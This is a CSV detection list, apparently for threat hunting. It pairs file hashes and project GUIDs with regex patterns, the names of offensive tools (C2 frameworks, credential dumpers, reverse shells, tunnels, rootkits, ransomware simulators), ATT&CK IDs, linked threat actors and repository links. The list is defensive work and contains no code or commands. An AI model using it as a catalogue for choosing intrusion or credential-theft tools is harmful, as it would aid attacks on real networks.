"*78a28021014c880da7336b529ed813f42c4a79fdc86d8ad38a579744abfcb71b*",".{0,1000}78a28021014c880da7336b529ed813f42c4a79fdc86d8ad38a579744abfcb71b.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","29331"
"*78a76b1d3ceef1a911bcf34067fee7546c3ee72d7f68a4a8a2da68812eaab49e*",".{0,1000}78a76b1d3ceef1a911bcf34067fee7546c3ee72d7f68a4a8a2da68812eaab49e.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","29333"
"*78a8a0392afbefb487d65be78caff5efb2f2f55de2593ea90c0ab23ed727afe2*",".{0,1000}78a8a0392afbefb487d65be78caff5efb2f2f55de2593ea90c0ab23ed727afe2.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","29334"
"*78a924220cf74c45f237414aa61e73f066f175f0cc47649dc0668769941ed305*",".{0,1000}78a924220cf74c45f237414aa61e73f066f175f0cc47649dc0668769941ed305.{0,1000}","offensive_tool_keyword","sshamble","SSHamble is a research tool for analyzing SSH implementations focusing on attacks against authentication - timing analysis and post-session enumeration.","T1021 - T1040 - T1592 - T1033","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/runZeroInc/sshamble","1","0","#filehash","N/A","10","10","946","74","2025-04-07T15:08:38Z","2024-07-27T20:32:10Z","29335"
"*78b0faf9c2d4afca5873ccc2f04bf9dbffdf76cf1b854f954d20a7335782ec95*",".{0,1000}78b0faf9c2d4afca5873ccc2f04bf9dbffdf76cf1b854f954d20a7335782ec95.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","29337"
"*78b372bf29a88ec2683f975ab11a728a53a19dba021023d9b2ee46fb94cf3a66*",".{0,1000}78b372bf29a88ec2683f975ab11a728a53a19dba021023d9b2ee46fb94cf3a66.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","29338"
"*78b4ff5e1bbac4a8bde265705a5c6e36b41bb2a9170f8f060a09bb1552549af2*",".{0,1000}78b4ff5e1bbac4a8bde265705a5c6e36b41bb2a9170f8f060a09bb1552549af2.{0,1000}","offensive_tool_keyword","PWDumpX","PWDumpX tool allows a user with administrative privileges to retrieve the encrypted password hashes and LSA secrets from a Windows system. This tool can be used on the local system or on one or more remote systems.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://packetstormsecurity.com/files/download/52580/PWDumpX.zip","1","0","#filehash","N/A","10","8","N/A","N/A","N/A","N/A","29339"
"*78ba173f30785ce45c8aa96e9cd13578d1db9bf48bece39a50617a8a49dd80f6*",".{0,1000}78ba173f30785ce45c8aa96e9cd13578d1db9bf48bece39a50617a8a49dd80f6.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","29340"
"*78BB6D02-6E02-4933-89DC-4AD8EE0B303F*",".{0,1000}78BB6D02\-6E02\-4933\-89DC\-4AD8EE0B303F.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","#GUIDproject","N/A","10","10","1884","425","2025-03-25T17:59:20Z","2017-12-17T13:04:14Z","29341"
"*78bbfbd2d6f42dad63fe000ec04b0c74bd35270b2cc5765404f5c780fe398f88*",".{0,1000}78bbfbd2d6f42dad63fe000ec04b0c74bd35270b2cc5765404f5c780fe398f88.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","29342"
"*78be236127f4f8c65a8a9818b43e32e33a9107325e14b80f53337cd34b8c53e8*",".{0,1000}78be236127f4f8c65a8a9818b43e32e33a9107325e14b80f53337cd34b8c53e8.{0,1000}","offensive_tool_keyword","BabyShark","This is a basic C2 generic server written in Python and Flask.","T1547.001 - T1059.003 - T1132.001 - T1140 - T1083 - T1070.004 - T1105 - T1056.001 - T1057 - T1012 - T1053.005 - T1218.005 - T1082 - T1016 - T1033","TA0006 - TA0011 - TA0040","N/A","Kimsuky","C2","https://github.com/UnkL4b/BabyShark","1","0","#filehash","N/A","10","10","189","30","2021-07-03T00:18:18Z","2020-06-02T12:27:20Z","29343"
"*78bef84073c09246a6acddeebb63557e60236175afc68408981a517c7e08d326*",".{0,1000}78bef84073c09246a6acddeebb63557e60236175afc68408981a517c7e08d326.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","29344"
"*78c15e32aa0d34c32550129f8f40cd76da56bef72a5efd949f92563876a74975*",".{0,1000}78c15e32aa0d34c32550129f8f40cd76da56bef72a5efd949f92563876a74975.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","29345"
"*78C76961-8249-4EFE-9DE2-B6EF15A187F7*",".{0,1000}78C76961\-8249\-4EFE\-9DE2\-B6EF15A187F7.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","#GUIDproject","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","29346"
"*78d6cc62452627889988e7d1d63675ee70a4cea3657631d55afb62467630c954*",".{0,1000}78d6cc62452627889988e7d1d63675ee70a4cea3657631d55afb62467630c954.{0,1000}","offensive_tool_keyword","rs-shell","rust reverse shell","T1071.004 - T1071.001 - T1573.002 - T1219 - T1059.001 - T1090.003","TA0011 - TA0005 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/BlWasp/rs-shell","1","0","#filehash","N/A","10","10","182","20","2024-09-03T21:48:21Z","2023-06-22T14:10:21Z","29348"
"*78dc269070acbaf7981717c584d983cba142abccb2c7efbd9158015147674e77*",".{0,1000}78dc269070acbaf7981717c584d983cba142abccb2c7efbd9158015147674e77.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","29350"
"*78DE9716-84E8-4469-A5AE-F3E43181C28B*",".{0,1000}78DE9716\-84E8\-4469\-A5AE\-F3E43181C28B.{0,1000}","offensive_tool_keyword","FormThief","Spoofing desktop login applications with WinForms and WPF","T1204.002 - T1056.004 - T1071.001","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/mlcsec/FormThief","1","0","#GUIDproject","N/A","8","2","173","31","2024-02-19T22:40:09Z","2024-02-19T22:34:07Z","29352"
"*78e4019194c23bd123a3bdd40aad7815e0bd1db967adfea97ea3df83084d1467*",".{0,1000}78e4019194c23bd123a3bdd40aad7815e0bd1db967adfea97ea3df83084d1467.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","29353"
"*78e8997b2a146086dbf974c2de541f845ad52ee9de76883cd6d8c76959b026f8*",".{0,1000}78e8997b2a146086dbf974c2de541f845ad52ee9de76883cd6d8c76959b026f8.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","29354"
"*78eed41cec221edd4ffed223f2fd2271a96224fd1173ed685c8c0b274fe93029*",".{0,1000}78eed41cec221edd4ffed223f2fd2271a96224fd1173ed685c8c0b274fe93029.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","29356"
"*78f555f713f391ee8b47078dab69267e837fffbbdeaa8e46c50be0e6336102f9*",".{0,1000}78f555f713f391ee8b47078dab69267e837fffbbdeaa8e46c50be0e6336102f9.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","29357"
"*78f6b056c337071f720db13a97fab5fec4ff8c4e35714a365bbfdfaaa8bd2afe*",".{0,1000}78f6b056c337071f720db13a97fab5fec4ff8c4e35714a365bbfdfaaa8bd2afe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","29358"
"*78fa6d6f41b506791944c470b4cceb3af184a9c6fcaa804d706763cb9c29b52b*",".{0,1000}78fa6d6f41b506791944c470b4cceb3af184a9c6fcaa804d706763cb9c29b52b.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","0","#filehash","N/A","10","3","245","37","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z","29359"
"*78fb6b3b97fe4c42400a477e013f1f848a5ccec7d4cf51d7087faf0583ad491e*",".{0,1000}78fb6b3b97fe4c42400a477e013f1f848a5ccec7d4cf51d7087faf0583ad491e.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","29361"
"*79023345917d346447982c87eae5639171d2bc091505dc0869632440bcc250f2*",".{0,1000}79023345917d346447982c87eae5639171d2bc091505dc0869632440bcc250f2.{0,1000}","offensive_tool_keyword","hackshell","Make BASH stealthy and hacker friendly with lots of bash functions","T1070.003 - T1059.004 - T1564.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/hackerschoice/hackshell","1","0","#filehash","N/A","9","3","251","28","2025-04-21T11:23:41Z","2024-07-16T15:56:11Z","29362"
"*7925b74698a6b8c9a8c0135a6fca700c610b8f97245b61d2949bc2b78c2f74fc*",".{0,1000}7925b74698a6b8c9a8c0135a6fca700c610b8f97245b61d2949bc2b78c2f74fc.{0,1000}","offensive_tool_keyword","NamelessC2","A C2 with all its components written in Rust","T1102 - T1573.001 - T1027 - T1219 - T1205","TA0011 - TA0003 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/trickster0/NamelessC2","1","0","#filehash","N/A","10","10","266","33","2024-09-26T21:21:20Z","2024-09-26T21:06:37Z","29366"
"*7926cbd1800a74416a6c36bdb022f80a6e217a3952099b5e929f9a183416bf49*",".{0,1000}7926cbd1800a74416a6c36bdb022f80a6e217a3952099b5e929f9a183416bf49.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","29367"
"*7936b47a27c7e2b5f41d8179581d712703ee286faefc2b4efa33bd6fa0a9aab1*",".{0,1000}7936b47a27c7e2b5f41d8179581d712703ee286faefc2b4efa33bd6fa0a9aab1.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","29369"
"*793bb27999fa08b9b9f9e58027be7444bbaa2d71786baa37bd9955a645fa7d21*",".{0,1000}793bb27999fa08b9b9f9e58027be7444bbaa2d71786baa37bd9955a645fa7d21.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/mitchmoser/SharpShares","1","0","#filehash","N/A","10","4","351","49","2021-09-21T08:14:27Z","2020-09-25T22:35:57Z","29371"
"*793f49ad93a26d3c9407ac76af0a8785610db3216cc96b348f6417c2e3583575*",".{0,1000}793f49ad93a26d3c9407ac76af0a8785610db3216cc96b348f6417c2e3583575.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","29373"
"*7943C5FF-C219-4E0B-992E-0ECDEB2681F3*",".{0,1000}7943C5FF\-C219\-4E0B\-992E\-0ECDEB2681F3.{0,1000}","offensive_tool_keyword","BackupCreds","A C# implementation of dumping credentials from Windows Credential Manager","T1003 - T1555","TA0006 - TA0005","N/A","Black Basta","Credential Access","https://github.com/leftp/BackupCreds","1","0","#GUIDproject","N/A","9","1","57","10","2023-09-23T10:37:05Z","2023-09-23T06:42:20Z","29374"
"*79520C3A-4931-46EB-92D7-334DA7FC9013*",".{0,1000}79520C3A\-4931\-46EB\-92D7\-334DA7FC9013.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","#GUIDproject","N/A","10","1","N/A","N/A","N/A","N/A","29377"
"*7952f508ed86aab60e0ffa5ac2a0af0e76eebc9d840cd3cad351adcb64adccc3*",".{0,1000}7952f508ed86aab60e0ffa5ac2a0af0e76eebc9d840cd3cad351adcb64adccc3.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","29378"
"*79565b23f130ffaeb3f02f6775acf74a3368368b010ed56d3b49bac6485b3b74*",".{0,1000}79565b23f130ffaeb3f02f6775acf74a3368368b010ed56d3b49bac6485b3b74.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","29379"
"*795845daafefd3f3b79a5cd599e45605aed74244de4a6d17eb1ccfb3568f938e*",".{0,1000}795845daafefd3f3b79a5cd599e45605aed74244de4a6d17eb1ccfb3568f938e.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","29382"
"*79584f6bf2e53a5d8fef078289568b57867d43a11a86cc98fcfe07a013f78c94*",".{0,1000}79584f6bf2e53a5d8fef078289568b57867d43a11a86cc98fcfe07a013f78c94.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","29383"
"*795bdabf997860026137d283b1536fb91ec13dba6eeea0b3d034a030e801efe7*",".{0,1000}795bdabf997860026137d283b1536fb91ec13dba6eeea0b3d034a030e801efe7.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","29384"
"*795f2e9d0314898ba5a63bd1fdc5fa18*",".{0,1000}795f2e9d0314898ba5a63bd1fdc5fa18.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","#filehash","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","29386"
"*796011ef9dd06969ac3d8a663e4cbc8ceeda566dc151181445284ab44d6eb1b4*",".{0,1000}796011ef9dd06969ac3d8a663e4cbc8ceeda566dc151181445284ab44d6eb1b4.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","29387"
"*796f70f040f3edcf0b48a711ad9ebce5a1f1dbbad15195d577e9c19c04fd0b88*",".{0,1000}796f70f040f3edcf0b48a711ad9ebce5a1f1dbbad15195d577e9c19c04fd0b88.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#filehash","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","29391"
"*796f70f7e01257c5b79e398851c836e915f6518e1e3ecd07bcd29233cf78f13d*",".{0,1000}796f70f7e01257c5b79e398851c836e915f6518e1e3ecd07bcd29233cf78f13d.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","29392"
"*7971e955309e5158aa13fe774596224af88ae64e53f09bd2ffb863acbf88864a*",".{0,1000}7971e955309e5158aa13fe774596224af88ae64e53f09bd2ffb863acbf88864a.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","29393"
"*797b944371e918b47143d0e4282033e057b7accf981ee5461652d659cccffd4e*",".{0,1000}797b944371e918b47143d0e4282033e057b7accf981ee5461652d659cccffd4e.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","29394"
"*79806039befe2c12c794ab8951aa17edf316843a8b968d22bd7abc9937252014*",".{0,1000}79806039befe2c12c794ab8951aa17edf316843a8b968d22bd7abc9937252014.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","#filehash","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","29395"
"*79816edc41cd5e2aeb19f0227e9cb9ab0b5abcc54931c6bf29813f8762828805*",".{0,1000}79816edc41cd5e2aeb19f0227e9cb9ab0b5abcc54931c6bf29813f8762828805.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","29396"
"*7985cfa2c992f22675afceef7bc9cf8e0d1fda7ce07a46eed77e390cc3157243*",".{0,1000}7985cfa2c992f22675afceef7bc9cf8e0d1fda7ce07a46eed77e390cc3157243.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","29398"
"*79867cf5f18de28036b96ac1beaa8aaa43c3fb44676d25173c592c16312ca9c7*",".{0,1000}79867cf5f18de28036b96ac1beaa8aaa43c3fb44676d25173c592c16312ca9c7.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","29399"
"*798ccfbf2e5c14077023d9236363c6e6ebf3bc6b28b551c01b00e272863bdcc7*",".{0,1000}798ccfbf2e5c14077023d9236363c6e6ebf3bc6b28b551c01b00e272863bdcc7.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 